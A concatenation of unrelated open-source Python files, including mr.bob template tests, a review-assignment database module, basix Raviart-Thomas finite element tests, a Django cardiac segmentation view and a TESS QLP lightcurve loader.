self.assertEqual(q, '--> Why?: ')
return 'foo'
q = self.call_FUT('foo', 'Why?', command_prompt=cmd)
answer = q.ask(DummyConfigurator())
self.assertEqual(answer, 'foo')
def test_ask_unicode(self):
def cmd(q):
self.assertTrue(isinstance(q, str))
return 'foo'
q = self.call_FUT('foo', six.u('č?'), command_prompt=cmd)
q.ask(DummyConfigurator())
def test_ask_default_empty(self):
q = self.call_FUT('foo',
'Why?',
default="moo",
command_prompt=lambda x: '')
answer = q.ask(DummyConfigurator())
self.assertEqual(answer, 'moo')
def test_ask_default_not_empty(self):
def cmd(q):
self.assertEqual(q, '--> Why? [moo]: ')
return 'foo'
q = self.call_FUT('foo',
'Why?',
default="moo",
command_prompt=cmd)
answer = q.ask(DummyConfigurator())
self.assertEqual(answer, 'foo')
def test_ask_no_default_and_not_required(self):
def cmd(q, go=['foo', '']):
return go.pop()
q = self.call_FUT('foo',
'Why?',
command_prompt=cmd)
answer = q.ask(DummyConfigurator())
self.assertEqual(answer, '')
def test_ask_no_default_and_required(self):
def cmd(q, go=['foo', '']):
return go.pop()
q = self.call_FUT('foo',
'Why?',
required=True,
command_prompt=cmd)
answer = q.ask(DummyConfigurator())
self.assertEqual(answer, 'foo')
def test_ask_no_help(self):
from six import StringIO
def cmd(q, go=['foo', '?']):
return go.pop()
sys.stdout = StringIO()
q = self.call_FUT('foo',
'Why?',
command_prompt=cmd)
q.ask(DummyConfigurator())
self.assertEqual(sys.stdout.getvalue(), 'There is no additional help text.\n\n')
sys.stdout = sys.__stdout__
def test_ask_help(self):
from six import StringIO
def cmd(q, go=['foo', '?']):
return go.pop()
sys.stdout = StringIO()
q = self.call_FUT('foo',
'Why?',
help="foobar_help",
command_prompt=cmd)
q.ask(DummyConfigurator())
self.assertEqual(sys.stdout.getvalue(), 'foobar_help\n\n')
sys.stdout = sys.__stdout__
def test_non_interactive_required(self):
from ..bobexceptions import ConfigurationError
q = self.call_FUT('foo', 'Why?', required=True)
c = DummyConfigurator(bobconfig={'non_interactive': 'True'})
self.assertRaises(ConfigurationError, q.ask, c)
def test_non_interactive_not_required(self):
q = self.call_FUT('foo', 'Why?')
c = DummyConfigurator(bobconfig={'non_interactive': 'True'})
answer = q.ask(c)
self.assertEquals(answer, '')
def test_defaults_override(self):
q = self.call_FUT('foo', 'Why?', default="foo")
c = DummyConfigurator(bobconfig={'non_interactive': 'True'},
defaults={'foo': 'moo'})
answer = q.ask(c)
self.assertEquals(answer, 'moo')
def test_pre_ask_question(self):
q = self.call_FUT('foo',
'Why?',
command_prompt=lambda x: '',
pre_ask_question="mrbob.tests.test_configurator:mocked_pre_ask_question")
c = DummyConfigurator()
q.ask(c)
mocked_pre_ask_question.assert_called_with(c, q)
def test_pre_ask_question_multiple(self):
q = self.call_FUT('foo', 'Why?', pre_ask_question="mrbob.tests.test_configurator:dummy_question_hook mrbob.tests.test_configurator:dummy_question_hook2")
self.assertEqual(q.pre_ask_question, [dummy_question_hook, dummy_question_hook2])
def test_pre_ask_question_skipquestion(self):
q = self.call_FUT('foo', 'Why?', pre_ask_question="mrbob.tests.test_configurator:dummy_question_hook_skipquestion")
self.assertEquals(q.ask(DummyConfigurator()), None)
def test_post_ask_question(self):
q = self.call_FUT('foo',
'Why?',
command_prompt=lambda x: '',
post_ask_question="mrbob.tests.test_configurator:mocked_post_ask_question")
c = DummyConfigurator()
answer = q.ask(c)
mocked_post_ask_question.assert_called_with(c, q, '')
self.assertEquals(mocked_post_ask_question(), answer)
def test_post_ask_question_multiple(self):
q = self.call_FUT('foo',
'Why?',
post_ask_question="mrbob.tests.test_configurator:dummy_question_hook mrbob.tests.test_configurator:dummy_question_hook2")
self.assertEqual(q.post_ask_question,
[dummy_question_hook, dummy_question_hook2])
def test_post_ask_question_validationerror(self):
def cmd(q, go=['bar', 'foo']):
return go.pop()
def side_effect(configurator, question, answer):
from ..bobexceptions import ValidationError
if answer == 'foo':
raise ValidationError
elif answer == 'bar':
return 'moo'
mocked_post_ask_question_validationerror.side_effect = side_effect
q = self.call_FUT('foo',
'Why?',
command_prompt=cmd,
post_ask_question="mrbob.tests.test_configurator:mocked_post_ask_question_validationerror")
c = DummyConfigurator()
self.assertEqual(q.ask(c), 'moo')
def test_post_ask_question_validationerror_non_interactive(self):
from ..bobexceptions import ConfigurationError, ValidationError
mocked_post_ask_question_validationerror_non_interactive.side_effect = ValidationError
q = self.call_FUT('foo',
'Why?',
command_prompt=lambda x: '',
post_ask_question="mrbob.tests.test_configurator:mocked_post_ask_question_validationerror_non_interactive")
c = DummyConfigurator(bobconfig={'non_interactive': 'True'})
self.assertRaises(ConfigurationError, q.ask, c)
```
#### File: jpcw/mr.bob/setup.py
```python
import os
import sys
import codecs
from setuptools import setup
from setuptools import find_packages
install_requires = [
'setuptools',
'six>=1.2.0', # 1.1.0 release doesn't have six.moves.input
]
if (3,) < sys.version_info < (3, 3):
# Jinja 2.7 drops Python 3.2 compat.
install_requires.append('Jinja2>=2.5.0,<2.7dev')
else:
install_requires.append('Jinja2>=2.5.0')
try:
import importlib # NOQA
except ImportError:
install_requires.append('importlib')
try:
from collections import OrderedDict # NOQA
except ImportError:
install_requires.append('ordereddict')
try:
import argparse # NOQA
except ImportError:
install_requires.append('argparse')
def read(*rnames):
return codecs.open(os.path.join(os.path.dirname(__file__), *rnames), 'r', 'utf-8').read()
setup(name='mr.bob',
version='0.2.dev0',
description='Bob renders directory structure templates',
long_description=read('README.rst') + '\n' + read('HISTORY.rst'),
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
],
author='<NAME>, <NAME>',
author_email='',
url='https://github.com/iElectric/mr.bob.git',
license='BSD',
packages=find_packages(),
install_requires=install_requires,
extras_require={
'test': [
'nose',
'coverage<3.6dev',
'flake8>2.0',
'mock',
],
'development': [
'zest.releaser',
'Sphinx',
],
},
entry_points="""
[console_scripts]
mrbob = mrbob.cli:main
""",
include_package_data=True,
zip_safe=False,
)
``` |
{
"source": "jpcyrino/a24systeme",
"score": 3
} |
#### File: a24systeme/a24s/reviews.py
```python
from .db import DBFactory
from .users import user_column_names
from uuid import uuid4, UUID
from psycopg2.extras import register_uuid
from datetime import datetime
from werkzeug.exceptions import abort
def _get_tutor_with_least_fullfillments_to_review():
register_uuid()
query = """
SELECT count(reviewer), users.id FROM review
FULL OUTER JOIN users ON review.reviewer=users.id
WHERE NOT users.role='student'
GROUP BY users.id ORDER BY count ASC;
"""
_, fetch, _ = DBFactory().start()
response = fetch(query)
if len(response) < 2:
return ('', 204)
return response[1]
def exec_create_review_for_fullfillment(fullfillment_id):
register_uuid()
if type(fullfillment_id) is not UUID:
UUID(fullfillment_id)
reviewer_id = _get_tutor_with_least_fullfillments_to_review()
review_id = uuid4()
query = """
INSERT INTO review (id,fullfillment,reviewer,created)
VALUES (%s, %s, %s,%s);
"""
data = (review_id,fullfillment_id,reviewer_id,datetime.now())
execute, *_ = DBFactory().start()
execute(query, data)
return { "id": review_id }
def exec_update_review(review_id, review_dict):
register_uuid()
if type(review_id) is not UUID:
UUID(review_id)
query = """
UPDATE review SET content=%s, grade=%s
WHERE id=%s;
"""
try:
data = (
review_dict["content"],
review_dict["grade"],
review_id
)
except:
abort(400)
execute, *_ = DBFactory().start()
execute(query, data)
return { "id": review_id, "content": review_dict["content"], "grade": review_dict["grade"]}
review_column_names = (
"id",
"fullfillment",
"reviewer",
"content",
"grade",
"created",
"sent"
)
def exec_get_reviews_by_reviewer_id(reviewer_id):
register_uuid()
if type(reviewer_id) is not UUID:
UUID(reviewer_id)
query = "SELECT * FROM review WHERE reviewer=%s;"
data = (reviewer_id, )
_,_,fetchall = DBFactory().start()
response = fetchall(query,data)
if response is None:
return ('',204)
return [dict(zip(review_column_names,r)) for r in response]
def exec_get_review_by_fullfillment_id(fullfillment_id):
register_uuid()
if type(fullfillment_id) is not UUID:
UUID(fullfillment_id)
query = "SELECT * FROM review WHERE fullfillment=%s;"
data = (fullfillment_id, )
_,fetch,_ = DBFactory().start()
response = fetch(query,data)
if response is None:
return ('',204)
return dict(zip(review_column_names,response))
def exec_send_review(review_id):
register_uuid()
if type(review_id) is not UUID:
UUID(review_id)
query = "UPDATE review SET sent=%s WHERE id=%s;"
data = (True, review_id)
execute, *_ = DBFactory().start()
execute(query,data)
return { "id": review_id }
def exec_delete_review(review_id):
register_uuid()
if type(review_id) is not UUID:
UUID(review_id)
query = "DELETE review WHERE id=%s;"
data = (review_id, )
execute, *_ = DBFactory().start()
execute(query,data)
return ('',204)
def exec_get_reviews():
query = "SELECT * FROM review;"
_,_,fetchall = DBFactory().start()
response = fetchall(query)
if response is None:
return ('',204)
return [dict(zip(review_column_names,r)) for r in response]
def exec_get_review(review_id):
register_uuid()
if type(review_id) is not UUID:
UUID(review_id)
query = "SELECT * FROM review WHERE id=%s;"
data = (review_id, )
_, fetch, _ = DBFactory().start()
response = fetch(query, data)
if response is None:
return ('', 204)
return dict(zip(review_column_names, response))
``` |
{
"source": "jpcyrino/chunker_dm",
"score": 3
} |
#### File: chunker_dm/tests/test_lexicon.py
```python
import unittest as ut
from chunker_dm.lexicon import Lexicon, ProbabilityLexicon, ComplexityLexicon
class TestLexicon(ut.TestCase):
def test_lexicon_adds_tokens_from_text(self):
lex = Lexicon()
lex.add("Isso é uma frase")
self.assertEqual(lex.total(), 4)
def test_lexicon_counts_frequency_of_word(self):
lex = Lexicon()
lex.add("Essa aqui é uma frase para testar uma classe de Léxico")
self.assertEqual(lex.frequency("uma"), 2)
self.assertEqual(lex.frequency("frase"),1)
def test_lexicon_tokenizes_properly(self):
lex = Lexicon()
lex.add("Uma frase.")
self.assertEqual(lex.frequency("frase"),1)
self.assertEqual(lex.frequency("frase."),0)
def test_gets_frequency_dict(self):
lex = Lexicon()
lex.add("Uma frase.")
fdict = lex.frequency_dict()
self.assertIs(type(fdict), dict)
self.assertEqual(fdict["uma"], 1)
class TestProbabilityLexicon(ut.TestCase):
def test_gets_probability_of_token(self):
plex = ProbabilityLexicon()
plex.add("Duas palavras.")
self.assertEqual(plex.probability("duas"),0.5)
self.assertEqual(plex.probability("palavras"),0.5)
def test_gets_probability_dict(self):
plex = ProbabilityLexicon()
plex.add("Uma frase.")
pdict = plex.probability_dict()
self.assertIs(type(pdict), dict)
self.assertEqual(pdict["uma"], 0.5)
class TestComplexityLexicon(ut.TestCase):
def test_returns_null_when_token_not_found(self):
clex = ComplexityLexicon()
clex.add("Uma frase.")
self.assertTrue(clex.complexity("frase"))
self.assertFalse(clex.complexity("cachorro"))
def test_gets_complexity_dict(self):
clex = ComplexityLexicon()
clex.add("Uma frase.")
cdict = clex.complexity_dict()
self.assertIs(type(cdict), dict)
self.assertEqual(cdict["uma"], 1)
``` |
{
"source": "jpdarricarrere/Trabalho_Eng_Software",
"score": 3
} |
#### File: bike-manager-be/emprestimo/ServicoEmprestimo.py
```python
class ServicoEmprestimo():
def __init__(self):
self._servico_bike = None
def set_servico_bike(self, servico_bike):
self._servico_bike = servico_bike
def reserva_bike(self, id_bike):
if self._servico_bike is None:
raise RuntimeError('ServicoEmprestimo has no way to reach bikes. Check that a reference to the bike service was passed to it.')
self._servico_bike.aluga_bike(id_bike)
```
#### File: bike-manager-be/usuario/ServicoUsuario.py
```python
from datetime import datetime
from typing import Optional
from .Usuario import Usuario
from .TipoUsuario import TipoUsuario
from .persistencia.InMemoryRepositorioUsuario import InMemoryRepositorioUsuario as RepositorioUsuario
class ServicoUsuario:
def listar_todos() -> 'list[Usuario]':
return RepositorioUsuario.get_all()
def criar(tipo: TipoUsuario, nome: str, ano_nascimento: int, mes_nascimento: int, dia_nascimento: int, email: str, senha: str):
data_nascimento = datetime(ano_nascimento, mes_nascimento, dia_nascimento)
novo_usuario = Usuario(None, tipo, nome, data_nascimento, email, senha)
usuario_persistido = RepositorioUsuario.save(novo_usuario)
return usuario_persistido
def encontrar(id: int) -> Optional[Usuario]:
return RepositorioUsuario.find_one(id)
def atualizar(id: int, tipo: TipoUsuario, nome: str, ano_nascimento: int, mes_nascimento: int, dia_nascimento: int, email: str, senha: str):
atual = RepositorioUsuario.find_one(id)
n_tipo = tipo if tipo is not None else atual.tipo
n_nome = nome if nome is not None else atual.nome
atual_data_nasc = atual.get_data_nascimento()
n_ano = ano_nascimento if ano_nascimento is not None else atual_data_nasc.year
n_mes = mes_nascimento if mes_nascimento is not None else atual_data_nasc.month
n_dia = dia_nascimento if dia_nascimento is not None else atual_data_nasc.day
n_data_nascimento = datetime(n_ano, n_mes, n_dia)
n_email = email if email is not None else atual.email
n_senha = senha if senha is not None else atual.senha
n_usuario = Usuario(id, n_tipo, n_nome, n_data_nascimento, n_email, n_senha)
usuario_persistido = RepositorioUsuario.save(n_usuario)
return usuario_persistido
def deletar(id: int):
RepositorioUsuario.delete(id)
``` |
{
"source": "jpdean/basix",
"score": 2
} |
#### File: basix/test/test_rt.py
```python
import basix
import numpy
import pytest
import sympy
from .test_lagrange import sympy_lagrange
def sympy_rt(celltype, n):
x = sympy.Symbol("x")
y = sympy.Symbol("y")
z = sympy.Symbol("z")
from sympy import S
topology = basix.topology(celltype)
geometry = S(basix.geometry(celltype).astype(int))
dummy = [sympy.Symbol("DUMMY1"), sympy.Symbol("DUMMY2"), sympy.Symbol("DUMMY3")]
funcs = []
if celltype == basix.CellType.triangle:
tdim = 2
for i in range(n):
for j in range(n - i):
for d in range(2):
funcs += [[x**j * y**i if k == d else 0 for k in range(2)]]
for i in range(n):
funcs.append([x ** (n - i) * y ** i, x ** (n - 1 - i) * y ** (i + 1)])
mat = numpy.empty((len(funcs), len(funcs)), dtype=object)
# edge normals
for i, f in enumerate(funcs):
if n == 1:
edge_basis = [sympy.Integer(1)]
else:
edge_basis = sympy_lagrange(basix.CellType.interval, n - 1)
edge_basis = [a.subs(x, dummy[0]) for a in edge_basis]
j = 0
for edge in topology[1]:
edge_geom = [geometry[t, :] for t in edge]
tangent = edge_geom[1] - edge_geom[0]
norm = sympy.sqrt(sum(i ** 2 for i in tangent))
tangent = [i / norm for i in tangent]
normal = [-tangent[1], tangent[0]]
param = [(1 - dummy[0]) * a + dummy[0] * b for a, b in zip(edge_geom[0], edge_geom[1])]
for g in edge_basis:
integrand = sum((f_i * v_i) for f_i, v_i in zip(f, normal))
integrand = integrand.subs(x, param[0]).subs(y, param[1])
integrand *= g * norm
mat[i, j] = integrand.integrate((dummy[0], 0, 1))
j += 1
# interior dofs
if n > 1:
for i, f in enumerate(funcs):
if n == 2:
face_basis = [sympy.Integer(1)]
else:
face_basis = sympy_lagrange(basix.CellType.triangle, n - 2)
j = n * 3
for g in face_basis:
for vec in [(1, 0), (0, 1)]:
integrand = sum((f_i * v_i) for f_i, v_i in zip(f, vec)) * g
mat[i, j] = integrand.integrate((x, 0, 1 - y)).integrate((y, 0, 1))
j += 1
elif celltype == basix.CellType.tetrahedron:
tdim = 3
for i in range(n):
for j in range(n - i):
for k in range(n - i - j):
for d in range(3):
funcs += [[x**k * y**j * z**i if m == d else 0 for m in range(3)]]
for j in range(n):
for k in range(n - j):
p = x ** (n - 1 - j - k) * y ** j * z ** k
funcs.append((x * p, y * p, z * p))
mat = numpy.empty((len(funcs), len(funcs)), dtype=object)
# face normals
for i, f in enumerate(funcs):
if n == 1:
face_basis = [sympy.Integer(1)]
else:
face_basis = sympy_lagrange(basix.CellType.triangle, n - 1)
face_basis = [a.subs(x, dummy[0]).subs(y, dummy[1]) for a in face_basis]
j = 0
for face in topology[2]:
face_geom = [geometry[t, :] for t in face]
axes = [face_geom[1] - face_geom[0], face_geom[2] - face_geom[0]]
normal = [axes[0][1] * axes[1][2] - axes[0][2] * axes[1][1],
axes[0][2] * axes[1][0] - axes[0][0] * axes[1][2],
axes[0][0] * axes[1][1] - axes[0][1] * axes[1][0]]
norm = sympy.sqrt(sum(i**2 for i in normal))
normal = [k / norm for k in normal]
param = [a + dummy[0] * b + dummy[1] * c for a, b, c in zip(face_geom[0], *axes)]
for g in face_basis:
integrand = sum(f_i * v_i for f_i, v_i in zip(f, normal))
integrand = integrand.subs(x, param[0]).subs(y, param[1]).subs(z, param[2])
integrand *= g * norm
mat[i, j] = integrand.integrate((dummy[0], 0, 1 - dummy[1])).integrate((dummy[1], 0, 1))
j += 1
assert j == 2 * n * (n + 1)
if n > 1:
for i, f in enumerate(funcs):
if n == 2:
interior_basis = [sympy.Integer(1)]
else:
interior_basis = sympy_lagrange(basix.CellType.tetrahedron, n - 2)
j = 2 * n * (n + 1)
for g in interior_basis:
for vec in [(1, 0, 0), (0, 1, 0), (0, 0, 1)]:
integrand = sum(f_i * v_i for f_i, v_i in zip(f, vec))
integrand *= g
mat[i, j] = integrand.integrate((x, 0, 1 - y - z)).integrate((y, 0, 1 - z)).integrate((z, 0, 1))
j += 1
mat = sympy.Matrix(mat)
mat = mat.inv()
g = []
for dim in range(tdim):
for r in range(mat.shape[0]):
g += [sum([v * funcs[i][dim] for i, v in enumerate(mat.row(r))])]
return g
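# Side note (added for reference, not part of the original test file): the
# basis assembled above spans the order-n Raviart-Thomas space, whose
# dimension is n*(n+2) on the triangle and n*(n+1)*(n+3)/2 on the
# tetrahedron, i.e. 3/8/15 and 4/15/36 functions for the orders 1-3
# exercised by the tests below.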
@pytest.mark.parametrize("order", [1, 2, 3])
def test_tri(order):
celltype = basix.CellType.triangle
g = sympy_rt(celltype, order)
x = sympy.Symbol("x")
y = sympy.Symbol("y")
rt = basix.create_element(basix.ElementFamily.RT, basix.CellType.triangle, order)
pts = basix.create_lattice(celltype, 1, basix.LatticeType.equispaced, True)
nderiv = 3
wtab = rt.tabulate(nderiv, pts)
for kx in range(nderiv):
for ky in range(0, nderiv - kx):
wsym = numpy.zeros_like(wtab[0])
for i in range(len(g)):
wd = sympy.diff(g[i], x, kx, y, ky)
for j, p in enumerate(pts):
wsym[j, i] = wd.subs([(x, p[0]), (y, p[1])])
assert(numpy.isclose(wtab[basix.index(kx, ky)], wsym).all())
@pytest.mark.parametrize("order", [1, 2, 3])
def test_tet(order):
celltype = basix.CellType.tetrahedron
g = sympy_rt(celltype, order)
x = sympy.Symbol("x")
y = sympy.Symbol("y")
z = sympy.Symbol("z")
rt = basix.create_element(basix.ElementFamily.RT, basix.CellType.tetrahedron, order)
pts = basix.create_lattice(celltype, 5, basix.LatticeType.equispaced, True)
nderiv = 1
wtab = rt.tabulate(nderiv, pts)
for k in range(nderiv + 1):
for q in range(k + 1):
for kx in range(q + 1):
ky = q - kx
kz = k - q
wsym = numpy.zeros_like(wtab[0])
for i in range(len(g)):
wd = sympy.diff(g[i], x, kx, y, ky, z, kz)
for j, p in enumerate(pts):
wsym[j, i] = wd.subs([(x, p[0]),
(y, p[1]),
(z, p[2])])
assert(numpy.isclose(wtab[basix.index(kx, ky, kz)], wsym).all())
``` |
{
"source": "jpdefrutosSINTEF/annotationweb_lung",
"score": 2
} |
#### File: annotationweb_lung/cardiac_apical_long_axis/views.py
```python
from django.conf import settings
from django.contrib.admin.views.decorators import staff_member_required
import json
from django.shortcuts import render, redirect
from django.contrib import messages
from django.http import HttpResponse, Http404, JsonResponse, HttpResponseRedirect
import random
from io import StringIO, BytesIO
import base64
from annotationweb.settings import BASE_DIR
from common.metaimage import *
import numpy as np
from annotationweb.models import Task, ImageAnnotation, Label
from common.utility import get_image_as_http_response
import common.task
from annotationweb.models import KeyFrameAnnotation
from spline_segmentation.models import ControlPoint
from django.db import transaction
def segment_next_image(request, task_id):
return segment_image(request, task_id, None)
def add_default_labels(task_id):
# Check if task has proper labels set up.
# If not add them to the database,
task = Task.objects.get(pk=task_id)
labels = (
('Endocardium', (0, 255, 0)),
('Epicardium', (0, 0, 255)),
('Left atrium', (255, 0, 0)),
('Aorta', (150, 70, 50)),
)
if len(task.label.all()) != 4:
# Remove old ones
for label in task.label.all():
task.label.remove(label)
print('Adding labels to task')
for label in labels:
try:
# Check if already exist
label_obj = Label.objects.get(name=label[0])
except Label.DoesNotExist:
label_obj = Label()
label_obj.name = label[0]
label_obj.color_red = label[1][0]
label_obj.color_green = label[1][1]
label_obj.color_blue = label[1][2]
label_obj.save()
task.label.add(label_obj)
task.save()
def segment_image(request, task_id, image_id):
add_default_labels(task_id)
try:
context = common.task.setup_task_context(request, task_id, Task.CARDIAC_ALAX_SEGMENTATION, image_id)
image_id = context['image'].id # Because image_id can initially be None
context['javascript_files'] = ['cardiac_apical_long_axis/segmentation.js']
# Check if image is already segmented, if so get data and pass to template
try:
annotations = KeyFrameAnnotation.objects.filter(image_annotation__task_id=task_id,
image_annotation__image_id=image_id)
control_points = ControlPoint.objects.filter(image__in=annotations).order_by('index')
context['control_points'] = control_points
context['target_frames'] = annotations
except KeyFrameAnnotation.DoesNotExist:
pass
return render(request, 'cardiac_apical_long_axis/segment_image.html', context)
except common.task.NoMoreImages:
messages.info(request, 'This task is finished, no more images to segment.')
return redirect('index')
except RuntimeError as e:
messages.error(request, str(e))
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
def save_segmentation(request):
error_messages = ''
motion_mode_line = int(round(float(request.POST['motion_mode_line'])))
control_points = json.loads(request.POST['control_points'])
target_frame_types = json.loads(request.POST['target_frame_types'])
print(control_points)
objects = ('Endocardium', 'Epicardium', 'Left atrium', 'Aorta')
rejected = request.POST['rejected'] == 'true'
if not rejected:
for frame_nr in control_points.keys():
for i in range(len(objects)):
if str(i) in control_points[frame_nr] and \
len(control_points[frame_nr][str(i)]['control_points']) < 1:
error_messages += objects[i] + ' annotation missing in frame ' + str(frame_nr) + '<br>'
if len(error_messages):
response = {
'success': 'false',
'message': error_messages,
}
else:
try:
# Use atomic transaction here so if something crashes the annotations are restored..
with transaction.atomic():
annotations = common.task.save_annotation(request)
# Save segmentation
# Save control points
for annotation in annotations:
frame_nr = str(annotation.frame_nr)
# Set frame metadata
annotation.frame_metadata = target_frame_types[frame_nr]
annotation.save()
for object in control_points[frame_nr]:
nr_of_control_points = len(control_points[frame_nr][object]['control_points'])
if nr_of_control_points < 2:
continue
for point in range(nr_of_control_points):
control_point = ControlPoint()
control_point.image = annotation
control_point.x = float(control_points[frame_nr][object]['control_points'][point]['x'])
control_point.y = float(control_points[frame_nr][object]['control_points'][point]['y'])
control_point.index = point
control_point.object = int(object)
# TODO modify this line to have proper label:
control_point.label = Label.objects.get(id=int(control_points[frame_nr][object]['label']['id']))
control_point.uncertain = bool(
control_points[frame_nr][object]['control_points'][point]['uncertain'])
control_point.save()
response = {
'success': 'true',
'message': 'Annotation saved',
}
except Exception as e:
response = {
'success': 'false',
'message': str(e),
}
return JsonResponse(response)
def show_segmentation(request, task_id, image_id):
pass
``` |
{
"source": "jpdeleon/archive_digger",
"score": 2
} |
#### File: jpdeleon/archive_digger/setup.py
```python
import os
import sys
import re
try:
from setuptools import setup
setup
except ImportError:
from distutils.core import setup
setup
if sys.argv[-1] == "publish":
os.system("python setup.py sdist upload")
sys.exit()
# Handle encoding
major, minor1, minor2, release, serial = sys.version_info
if major >= 3:
def rd(filename):
f = open(filename, encoding="utf-8")
r = f.read()
f.close()
return r
else:
def rd(filename):
f = open(filename)
r = f.read()
f.close()
return r
setup(
name='archive_digger',
packages =['archive_digger'],
version="0.1.1",
author='<NAME>',
author_email = '<EMAIL>',
url = 'https://github.com/jpdeleon/archive_digger',
license = ['GNU GPLv3'],
description ='simple query for archival radial velocity data of TESS targets',
long_description=rd("README.md") + "\n\n"
+ "---------\n\n",
package_dir={"exofop": "exofop"},
#package_data={"data": []},
scripts=['scripts/query_harps'],
#include_package_data=True,
keywords=[],
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'Programming Language :: Python'
],
install_requires = ['pandas','astropy','astroplan','tqdm'],
)
``` |
{
"source": "jpdeleon/chronos",
"score": 2
} |
#### File: chronos/chronos/qlp.py
```python
r"""
classes for working with lightcurves from the QLP pipeline:
http://archive.stsci.edu/hlsp/qlp
"""
# Import standard library
from pathlib import Path
import logging
# Import library
import numpy as np
import pandas as pd
import matplotlib.pyplot as pl
import astropy.units as u
import lightkurve as lk
from astropy.io import fits
# Import from package
from chronos.config import DATA_PATH
from chronos.target import Target
from chronos.tpf import FFI_cutout
# from chronos.plot import plot_tls, plot_odd_even
from chronos.utils import get_transit_mask, parse_aperture_mask, TessLightCurve
log = logging.getLogger(__name__)
__all__ = ["QLP"]
QLP_SECTORS = np.arange(11, 27, 1)
class QLP(Target):
"""
http://archive.stsci.edu/hlsp/qlp
"""
def __init__(
self,
sector=None,
name=None,
toiid=None,
ticid=None,
epicid=None,
gaiaDR2id=None,
ra_deg=None,
dec_deg=None,
quality_bitmask=None,
search_radius=3,
aper="best",
lctype="KSPSAP",
mission="tess",
verbose=True,
clobber=True,
):
super().__init__(
name=name,
toiid=toiid,
ticid=ticid,
epicid=epicid,
gaiaDR2id=gaiaDR2id,
ra_deg=ra_deg,
dec_deg=dec_deg,
search_radius=search_radius,
verbose=verbose,
)
"""Initialize QLP.
See http://archive.stsci.edu/hlsp/qlp
Attributes
----------
lctype : str
KSPSAP : Normalized light curve detrended by kepler spline
aper : str
best, small, large
"""
self.sector = sector
if self.sector is None:
print(f"Available sectors: {self.all_sectors}")
if len(self.all_sectors) != 1:
idx = [
True if s in QLP_SECTORS else False
for s in self.all_sectors
]
if sum(idx) == 0:
msg = f"QLP lc is currently available for sectors={QLP_SECTORS}\n"
raise ValueError(msg)
if sum(idx) == 1:
self.sector = self.all_sectors[idx][
0
] # get first available
else:
self.sector = self.all_sectors[idx][
0
] # get first available
print(
f"QLP lc may be available for sectors {self.all_sectors[idx]}"
)
print(f"Using sector={self.sector}.")
if self.gaiaid is None:
_ = self.query_gaia_dr2_catalog(return_nearest_xmatch=True)
self.aper = aper
self.apers = ["best", "small", "large"]
if self.aper not in self.apers:
raise ValueError(f"Type not among {self.apers}")
self.quality_bitmask = quality_bitmask
self.fits_url = None
self.hdulist = None
self.header0 = None
self.lctype = lctype.upper()
self.lctypes = ["SAP", "KSPSAP"]
if self.lctype not in self.lctypes:
raise ValueError(f"Type not among {self.lctypes}")
self.data, self.header = self.get_qlp_fits()
self.lc = self.get_qlp_lc()
self.lc.targetid = self.ticid
self.cadence = self.header["TIMEDEL"] * u.d
self.time = self.lc.time
self.flux = self.lc.flux
self.err = self.lc.flux_err
self.sap_mask = "round"
self.threshold_sigma = 5 # dummy
self.percentile = 95 # dummy
self.cutout_size = (15, 15) # dummy
self.aper_radius = None
self.tpf_tesscut = None
self.ffi_cutout = None
self.aper_mask = None
self.contratio = None
def get_qlp_url(self):
"""
hlsp_qlp_tess_ffi_<sector>-<tid>_tess_v01_llc.<exten>
where:
<sector> = The Sector represented as a 4-digit, zero-padded string,
preceded by an 's', e.g., 's0026' for Sector 26.
<tid> = The full, 16-digit, zeo-padded TIC ID.
<exten> = The light curve data type, either "fits" or "txt".
"""
base = "https://archive.stsci.edu/hlsps/qlp/"
assert self.sector is not None
sec = str(self.sector).zfill(4)
tic = str(self.ticid).zfill(16)
fp = (
base
+ f"s{sec}/{tic[:4]}/{tic[4:8]}/{tic[8:12]}/{tic[12:16]}/hlsp_qlp_tess_ffi_s{sec}-{tic}_tess_v01_llc.fits"
)
return fp
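# Illustrative sketch (not part of the original class): for a hypothetical
# target with TIC ID 123456789 observed in sector 11, the pattern above
# resolves to
# https://archive.stsci.edu/hlsps/qlp/s0011/0000/0001/2345/6789/hlsp_qlp_tess_ffi_s0011-0000000123456789_tess_v01_llc.fits
# i.e. the zero-padded TIC ID is split into four 4-digit directory levels
# and then reused in the file name.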
def get_qlp_fits(self):
"""get qlp target and light curve header and data
"""
fp = self.get_qlp_url()
try:
hdulist = fits.open(fp)
if self.verbose:
print(hdulist.info())
lc_data = hdulist[1].data
lc_header = hdulist[1].header
# set
self.fits_url = fp
self.hdulist = hdulist
self.header0 = hdulist[0].header
return lc_data, lc_header
except Exception:
msg = f"File not found:\n{fp}\n"
raise ValueError(msg)
def get_qlp_lc(self, lc_type=None, aper=None, sort=True):
"""
Parameters
----------
lc_type : str
{SAP, KSPSAP}
"""
lc_type = lc_type.upper() if lc_type is not None else self.lctype
aper = aper.upper() if aper is not None else self.aper
assert lc_type in self.lctypes
assert aper in self.apers
if self.verbose:
print(f"Using QLP {lc_type} (rad={self.aper}) lightcurve.")
time = self.data["TIME"] + 2457000 # BJD, days
if aper == "small":
flux = self.data["KSPSAP_FLUX_SML"]
elif aper == "large":
flux = self.data["KSPSAP_FLUX_LAG"]
else:
flux = self.data[f"{lc_type}_FLUX"]
if lc_type == "KSPSAP":
err = self.data[f"{lc_type}_FLUX_ERR"]
else:
err = np.ones_like(flux) * np.std(flux)
x = self.data["SAP_X"]
y = self.data["SAP_Y"]
quality = self.data["QUALITY"]
cadence = self.data["CADENCENO"]
if sort:
idx = np.argsort(time)
else:
idx = np.ones_like(time, bool)
# hack tess lightkurve
return TessLightCurve(
time=time[idx],
flux=flux[idx],
flux_err=err[idx],
# FIXME: only day works when using lc.to_periodogram()
time_format="jd", # TIMEUNIT is d in fits header
time_scale="tdb", # TIMESYS in fits header
centroid_col=x,
centroid_row=y,
quality=quality,
quality_bitmask=self.quality_bitmask,
cadenceno=cadence,
sector=self.sector,
targetid=self.toi_params["TIC ID"]
if self.toi_params is not None
else self.ticid,
ra=self.target_coord.ra.deg,
dec=self.target_coord.dec.deg,
label=None,
meta=None,
).normalize()
def validate_target_header(self):
"""
see self.header0
"""
raise NotImplementedError()
